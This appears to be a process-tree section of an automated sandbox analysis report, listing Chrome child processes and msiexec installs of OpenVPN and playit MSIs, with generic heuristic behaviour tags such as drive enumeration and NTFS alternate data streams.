C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c3cc40,0x7ffe71c3cc4c,0x7ffe71c3cc582⤵PID:1476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1740,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=1736 /prefetch:22⤵PID:2272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=2108 /prefetch:32⤵
- Mark of the Web detected: This indicates that the page was originally saved or cloned.
PID:3120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=2164 /prefetch:82⤵PID:3680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3224 /prefetch:12⤵PID:1228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:1108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3060,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4436 /prefetch:12⤵PID:3772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3544 /prefetch:82⤵PID:2328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4608,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4412 /prefetch:82⤵PID:1932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4416,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4844 /prefetch:82⤵PID:2096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4908,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:3392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4932,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4664 /prefetch:12⤵PID:1140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4308,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:3568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3432,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:2096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3444,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:1664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5408,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5364 /prefetch:82⤵
- NTFS ADS
PID:3392
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\OpenVPN-2.6.13-I001-amd64.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:72
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5612,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6044 /prefetch:12⤵PID:3304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6420,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6400 /prefetch:12⤵PID:2768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6572,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6284 /prefetch:82⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6636,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6668 /prefetch:82⤵PID:1148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6408,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:1148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6752,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:5536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=4636,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6112 /prefetch:12⤵PID:5796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6768,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5180 /prefetch:12⤵PID:5872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6744,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6700 /prefetch:12⤵PID:5952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6868,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6732 /prefetch:12⤵PID:2580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=7016,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6864 /prefetch:12⤵PID:5196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6008,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4980 /prefetch:12⤵PID:2012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=6316,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4512 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6348,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4620 /prefetch:12⤵PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=5272,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6336 /prefetch:12⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3436,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6880 /prefetch:82⤵PID:1504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6596,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5016 /prefetch:82⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6740,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4920 /prefetch:12⤵PID:5988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6360,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4524 /prefetch:12⤵PID:5968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=3272,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5708 /prefetch:12⤵PID:1480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7128,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5124 /prefetch:82⤵
- NTFS ADS
PID:5712
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\playit-windows-x86_64-signed.msi"2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:2056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6628,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5928 /prefetch:82⤵
- NTFS ADS
PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=4528,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5364 /prefetch:12⤵PID:5256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=7136,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6844 /prefetch:12⤵PID:3356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5984 /prefetch:82⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5096 /prefetch:82⤵PID:556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=5044,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7148 /prefetch:12⤵PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=4976,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4972 /prefetch:12⤵PID:6008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6552,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7172 /prefetch:82⤵PID:3180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=5616,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6084 /prefetch:12⤵PID:2472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6292,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=1424 /prefetch:82⤵
- NTFS ADS
PID:4152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=7476,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=1416 /prefetch:12⤵PID:6896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=7556,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7468 /prefetch:12⤵PID:5892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=7488,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7756 /prefetch:12⤵PID:6828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7884,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7904 /prefetch:12⤵PID:7132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=8044,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7548 /prefetch:12⤵PID:4124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=5304,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8056 /prefetch:12⤵PID:2100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=4780,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=7760 /prefetch:12⤵PID:2972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8440,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8352 /prefetch:82⤵PID:3040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8500,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8504 /prefetch:82⤵PID:6452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8376,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8656 /prefetch:82⤵PID:3752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8496,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8652 /prefetch:82⤵PID:5412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=7888,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8160 /prefetch:12⤵PID:6152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=8372,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8400 /prefetch:12⤵PID:992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8132,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5392 /prefetch:82⤵PID:3580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=8396,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8364 /prefetch:12⤵PID:6724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=8884,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8864 /prefetch:12⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8644,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8096 /prefetch:82⤵PID:6228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9000,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8416 /prefetch:82⤵PID:7068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8660,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=9152 /prefetch:82⤵PID:6748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9296,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=9304 /prefetch:82⤵PID:7120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=8556,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=8600 /prefetch:12⤵PID:6468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=6092,i,12172026993180939695,5056524176161258864,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=6576 /prefetch:12⤵PID:6208
-
-
